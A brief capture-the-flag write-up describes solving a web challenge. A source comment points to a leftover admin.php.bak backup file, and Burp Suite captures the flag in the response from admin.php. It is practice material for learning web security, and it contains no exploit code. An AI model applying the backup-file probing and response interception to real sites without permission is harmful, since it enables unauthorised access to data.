# **Presentation**
The objective is to find the flag hidden in the site.
# **Flaw Exploited**
The flaw exploited is in the HTTP request. Indeed this one returns an interesting element. There is also a flaw in the files left in the site.
# **Solution**
Looking at the source code of the site, we see that he writes that the developer should not forget to remove the admin.php.bak.
We can therefore try to recover the file from the url.
We see in the file that at the end of the php code, it executes the command
`echo flag`
We must therefore try to access the admin.php file.
I have personally used the Burpsuite tool to retrieve the requests that are returned.
When we try to access admin.php the site sends us a request with the flag inside.

If you liked this writeup you can check our github with this [link](https://github.com/PoCInnovation/ReblochonWriteups/tree/master/PicoCTF2021) and star our repository.

Equipe Reblochon HeroCTF